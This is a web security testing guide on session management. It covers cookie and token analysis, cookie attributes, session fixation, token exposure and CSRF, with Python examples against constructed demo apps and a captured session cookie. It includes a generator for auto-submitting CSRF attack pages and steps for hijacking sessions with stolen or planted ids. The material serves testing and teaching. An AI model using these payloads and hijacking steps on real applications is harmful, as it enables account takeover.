Session Management Testing

1. Testing for Session Management Schema
This section describes how to analyse the session management schema, with the goal of understanding how the session
management mechanism was built and whether it can be broken to hijack or bypass a user's session. It covers how to test
the security of the session tokens issued to the client's browser: how to reverse engineer a cookie, and how to manipulate
cookies to hijack a session.
Tool used: the Add & Edit Cookies browser add-on, to list and modify the cookies the application sets.
Result: (screenshot in the original post, not reproduced here)
2. Testing for Cookie Attributes
Cookies are often a key attack vector for malicious users (typically targeting other users), so the application should
take due care to protect them. This section looks at the precautions an application can take when assigning cookies and
at how to test that these attributes have been correctly configured.
The cookies found on the target (as sent by the browser in the Cookie request header) were:
akakom_tpl=akakom; __utma=242819602.2057941145.1307427908.1307427908.1307430421.2; __utmz=242819602.1307427908.1.1.utmcsr=172.17.38.254|utmccn=(referral)|utmcmd=referral|utmcct=/login; __utmb=242819602.2.10.1307430421; 69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; __utmc=242819602
The __utma, __utmb, __utmc and __utmz cookies belong to Google Analytics and are not session identifiers. The candidates for
the session token are akakom_tpl (apparently a template selector, not a secret) and the cookie with the 32-character
hexadecimal name, whose 26-character value has the shape of a PHP session identifier. Note that a Cookie request header
carries only names and values: the Secure, HttpOnly, Domain, Path and Expires attributes are visible only in the server's
Set-Cookie response headers (or in the add-on's cookie view), so that is where they must be checked.
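The two checks above (which cookie carries the session, what the token looks like, and which attributes are missing) can be done offline on captured headers. The following is an added example, not code from the original post: it takes the Cookie header quoted above as constructed input, filters out the tracking cookies, profiles the remaining token values, and audits two constructed Set-Cookie headers for the session cookie (the weak form and a hardened form; both headers are assumptions, since the post shows only the request side).

```python
import math
import string

# Constructed input: the request Cookie header captured on the target.
# A Cookie request header carries names and values only, no attributes.
CAPTURED_COOKIE_HEADER = (
    "akakom_tpl=akakom; "
    "__utma=242819602.2057941145.1307427908.1307427908.1307430421.2; "
    "__utmz=242819602.1307427908.1.1.utmcsr=172.17.38.254|utmccn=(referral)"
    "|utmcmd=referral|utmcct=/login; "
    "__utmb=242819602.2.10.1307430421; "
    "69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; "
    "__utmc=242819602"
)

# Constructed Set-Cookie response headers for the session cookie (assumed, the
# post does not show the response): a weak form and a hardened form.
WEAK_SET_COOKIE = "69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; path=/"
HARDENED_SET_COOKIE = (
    "69cb2eb0a19889c0e172765110b05475=9hjssavtaja0476hriti01gt25; "
    "Path=/; Secure; HttpOnly; SameSite=Lax"
)

# Google Analytics and similar tracking cookies are never session identifiers.
ANALYTICS_PREFIXES = ("__utm", "_ga", "_gid", "_gat")


def split_cookie_header(header):
    """Split a request 'Cookie:' header into {name: value}."""
    cookies = {}
    for part in header.split(";"):
        part = part.strip()
        if "=" not in part:
            continue
        name, _, value = part.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def session_candidates(cookies):
    """Drop tracking cookies; the session id must live in what remains."""
    return {n: v for n, v in cookies.items() if not n.startswith(ANALYTICS_PREFIXES)}


def token_profile(value):
    """Alphabet, length and an upper bound on the entropy of one token value.
    The bound assumes uniform, independent characters (the best case); real
    randomness has to be measured over many sampled tokens, not one."""
    chars = set(value)
    for label, alphabet in (
        ("hex", "0123456789abcdef"),
        ("0-9a-v", string.digits + "abcdefghijklmnopqrstuv"),
        ("0-9a-z", string.digits + string.ascii_lowercase),
        ("alnum", string.digits + string.ascii_letters),
        ("base64", string.digits + string.ascii_letters + "+/="),
    ):
        if chars <= set(alphabet):
            size = len(alphabet)
            break
    else:
        label, size = "other", len(chars)
    return {"length": len(value), "charset": label,
            "max_bits": round(len(value) * math.log2(size))}


def parse_set_cookie(header):
    """Parse one Set-Cookie header into (name, value, {attribute: value or True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return name.strip(), value.strip(), attrs


def audit_set_cookie(header, is_session_cookie=True):
    """Return the attribute problems found in one Set-Cookie header."""
    _, _, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure: cookie is also sent over plaintext HTTP")
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable by script, so any XSS steals it")
    if "samesite" not in attrs:
        findings.append("missing SameSite: sent on cross-site requests (CSRF)")
    elif str(attrs["samesite"]).lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure: browsers reject it")
    if is_session_cookie and ("expires" in attrs or "max-age" in attrs):
        findings.append("persistent session cookie: survives browser close")
    domain = attrs.get("domain")
    if isinstance(domain, str) and domain.startswith("."):
        findings.append(f"Domain={domain}: shared with every subdomain")
    return findings
```

Running the profile over the captured value gives 26 characters over the alphabet 0-9a-v, which is exactly what 128 bits of hash output encoded at 5 bits per character produces; that says nothing about how the value was generated, so the real test is to collect a few hundred tokens and look for sequential or time-correlated patterns.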

3. Testing for Session Fixation
When an application does not renew the session cookie after successful authentication, it may be vulnerable to session
fixation: the attacker forces the victim to use a session identifier the attacker already knows (for example by setting it
before the victim logs in), waits for the victim to authenticate, and then presents the same identifier to take over the
authenticated session. The test is to note the session id before login, log in, and check whether the id changed and
whether the old one still works.
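The procedure above, as an added example that is not part of the original post: two tiny in-memory applications (one that adopts any client-supplied id and keeps it across login, one that issues a fresh id on login) and the three observations the tester makes from the attacker's position. The applications, the cookie behaviour and the credentials are all constructed for the demo; in a real test the same three observations are made on the Set-Cookie headers before and after the login POST.

```python
import secrets

# Constructed demo credentials; there is no real server behind this.
PASSWORDS = {"alice": "s3cret"}


class DemoApp:
    """Server-side session table shared by both demo implementations."""

    def __init__(self):
        self.sessions = {}  # session id -> {"user": None or username}

    def whoami(self, sid):
        return self.sessions.get(sid, {}).get("user")


class VulnerableApp(DemoApp):
    """Adopts whatever id the client presents and keeps it across login."""

    def visit(self, sid=None):
        if sid is None:
            sid = secrets.token_hex(16)
        # Any id, even one the server never issued, becomes a live session.
        self.sessions.setdefault(sid, {"user": None})
        return sid

    def login(self, sid, user, password):
        if PASSWORDS.get(user) != password:
            return None
        self.sessions[sid]["user"] = user
        return sid  # same id before and after authentication


class FixedApp(DemoApp):
    """Ignores unknown ids and issues a fresh id on every privilege change."""

    def visit(self, sid=None):
        if sid not in self.sessions:
            sid = secrets.token_hex(16)
            self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, user, password):
        if PASSWORDS.get(user) != password:
            return None
        self.sessions.pop(sid, None)  # the pre-login id is dead from here on
        new_sid = secrets.token_hex(16)
        self.sessions[new_sid] = {"user": user}
        return new_sid


def fixation_test(app, user, password):
    """The three observations a tester makes when checking for fixation."""
    planted = "attacker-chosen-" + secrets.token_hex(4)
    sid_before = app.visit(planted)  # victim arrives carrying the planted id
    sid_after = app.login(sid_before, user, password)
    return {
        "adopted_planted_id": sid_before == planted,
        "id_unchanged_after_login": sid_after == sid_before,
        "planted_id_is_authenticated": app.whoami(planted) == user,
    }
```

Any one of the three flags being true is a finding; the last one is the actual takeover, because the attacker can now send the planted id and act as the victim.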
4. Testing for Exposed Session Variables
Session tokens are confidential information because they bind the user's identity to their session. This section tests
whether the session token is exposed (for example sent over an unencrypted channel, placed in a URL, leaked through the
Referer header, or echoed in page content) so that an attacker who captures it can replay it and take over the session.
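The exposure checks above, as an added example that is not part of the original post: a scanner that runs over a captured set of requests and responses and reports every place the session token shows up where it should not. The capture, the hostnames and the paths are constructed for the demo; the token value is the one found in the target's cookie.

```python
from urllib.parse import parse_qs, urlsplit

# The session id found in the target's cookie, reused as the value to hunt for.
TOKEN = "9hjssavtaja0476hriti01gt25"

# Constructed traffic capture: one entry per request, with the response body
# where it matters. Hosts and paths are invented for the example.
EXCHANGES = [
    {"method": "POST", "url": "https://app.example/login",
     "headers": {"Cookie": f"sid={TOKEN}"},
     "response_body": "<html>welcome</html>"},
    {"method": "GET", "url": f"http://app.example/index.php?view=profile&sid={TOKEN}",
     "headers": {"Cookie": f"sid={TOKEN}"},
     "response_body": ""},
    {"method": "GET", "url": "https://stats.thirdparty.example/pixel.gif",
     "headers": {"Referer": f"https://app.example/index.php?sid={TOKEN}"},
     "response_body": ""},
    {"method": "GET", "url": "https://app.example/account",
     "headers": {"Cookie": f"sid={TOKEN}"},
     "response_body": f'<script>var sid = "{TOKEN}";</script>'},
]


def find_token_exposures(token, exchanges):
    """Report every request in which the token travels somewhere it can be captured."""
    findings = []
    for i, ex in enumerate(exchanges):
        url = urlsplit(ex["url"])
        headers = ex.get("headers", {})
        where = f"#{i} {ex['method']} {url.netloc}{url.path}"
        # Plaintext transport: anyone on the path reads the Cookie header.
        if url.scheme == "http" and token in headers.get("Cookie", ""):
            findings.append(f"{where}: token sent over plaintext HTTP")
        # URL placement: ends up in history, proxy and server logs, and Referers.
        in_query = any(token in v for values in parse_qs(url.query).values() for v in values)
        if in_query or token in url.path:
            findings.append(f"{where}: token in URL (browser history, proxy and server logs)")
        # Referer leak: a token in the previous page's URL is handed to a third party.
        if token in headers.get("Referer", ""):
            findings.append(f"{where}: token leaked to {url.netloc} via Referer")
        # Echoed into content: readable by any script on the page, so XSS steals it.
        if token in ex.get("response_body", ""):
            findings.append(f"{where}: token echoed in response body (readable by script)")
    return findings
```

Each finding is a capture point; the replay test that follows is to take the token from that point, drop it into a fresh browser session and confirm the application treats the request as the victim.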
5. Testing for CSRF
Cross-Site Request Forgery (CSRF) is a way to force an unwitting user to execute unwanted actions on a web application in
which they are currently authenticated: the attacker's page submits a request to the application, and the browser attaches
the victim's session cookie to it. This section describes how to test an application for this kind of vulnerability: find
the state-changing requests, check whether they carry an unpredictable per-session token, and replay them from another
origin.
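The CSRF test above, as an added example that is not part of the original post: a form extractor, a heuristic for spotting an anti-CSRF token, and a generator for the auto-submitting proof-of-concept page an attacker would host. The two forms, the page URL and the field names are constructed for the demo; the token-name hints are assumptions about common naming, not a rule from the post.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed pages: a change-email form without any anti-CSRF token, and the
# same form protected with a per-session hidden token.
VULNERABLE_PAGE = """
<form action="/user/email" method="post">
  <input type="email" name="email" value="alice@example.org">
  <input type="submit" name="task" value="save">
</form>"""
PROTECTED_PAGE = """
<form action="/user/email" method="post">
  <input type="email" name="email" value="alice@example.org">
  <input type="hidden" name="csrf_token" value="7f3a9c1e2b4d6f8091a2b3c4d5e6f708">
  <input type="submit" name="task" value="save">
</form>"""

# Assumed naming conventions; frameworks vary.
TOKEN_NAME_HINTS = ("csrf", "token", "nonce", "authenticity")


class FormParser(HTMLParser):
    """Collect every form with its action, method and inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._form = {"action": a.get("action") or "",
                          "method": (a.get("method") or "get").lower(),
                          "inputs": []}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append({"type": (a.get("type") or "text").lower(),
                                         "name": a.get("name"),
                                         "value": a.get("value") or ""})

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def parse_forms(page):
    parser = FormParser()
    parser.feed(page)
    return parser.forms


def has_csrf_token(form):
    """Heuristic: a hidden field named like a token, or carrying a long value."""
    for inp in form["inputs"]:
        if inp["type"] != "hidden" or not inp["name"]:
            continue
        if any(hint in inp["name"].lower() for hint in TOKEN_NAME_HINTS):
            return True
        if len(inp["value"]) >= 16:
            return True
    return False


def csrf_poc(form, page_url, overrides):
    """Auto-submitting page that replays the form from the attacker's origin,
    with the fields the attacker wants changed. Named submit buttons are kept
    because servers often dispatch on them."""
    action = urljoin(page_url, form["action"])
    fields = []
    for inp in form["inputs"]:
        if not inp["name"]:
            continue
        value = overrides.get(inp["name"], inp["value"])
        fields.append(f'<input type="hidden" name="{escape(inp["name"], True)}" '
                      f'value="{escape(value, True)}">')
    return ('<html><body onload="document.forms[0].submit()">'
            f'<form action="{escape(action, True)}" method="{form["method"]}">'
            + "".join(fields) + "</form></body></html>")
```

The heuristic is a triage aid only: a framework that uses a random field name with a constant value would slip past it, and a token that is present but never validated would pass it. The decisive check is to replay the request with the token removed or altered and confirm that the server rejects it; the generated page, loaded in a browser that holds a live session, is the positive proof when it does not.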
